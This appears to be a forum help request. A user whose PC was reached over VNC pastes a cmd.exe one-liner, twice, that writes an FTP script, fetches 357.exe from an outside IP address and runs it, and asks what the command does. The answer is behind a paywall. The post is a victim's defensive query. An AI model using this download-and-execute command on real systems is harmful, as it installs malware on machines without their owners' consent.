I got hacked. Found this command,
I was trouble shooting a time out issue with my internet connection. During this process I disconnected my switch, then I took my router of the mix. At this point , my PC was connected directly to my DSL modem. After 15 minutes past I walked away from my pc for 2 minutes. I came back to find my VNC icon Black, which means someon was connected, and my Symantec Auto Protect box up on the screen. I immediatly closed the VNC session. I then went to run a netstat to see if someone was connected and noticed this string in the command window.
cmd.exe /c del i&echo open 66.16.176.238 12680 > i&echo user 1 1 >> i &echo get 357.exe >> i &echo quit >> i &ftp -n -s:i &357.exe&del i&exit
That same IP address was the ip address that connected to my computer via VNC. I found it on the event viewer.
I then checked the symantec log and it shows that it blocked the w32.spybot.worm. Here is what I am guessing.
This bunghole connected to my machine, someone how got into my VNC, and attempted to download a virus, but Norton caught it.
Can anyone tell me for sure what the above command does?
cmd.exe /c del i&echo open 66.16.176.238 12680 > i&echo user 1 1 >> i &echo get 357.exe >> i &echo quit >> i &ftp -n -s:i &357.exe&del i&exit
That same IP address was the ip address that connected to my computer via VNC. I found it on the event viewer.
I then checked the symantec log and it shows that it blocked the w32.spybot.worm. Here is what I am guessing.
This bunghole connected to my machine, someone how got into my VNC, and attempted to download a virus, but Norton caught it.
Can anyone tell me for sure what the above command does?
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.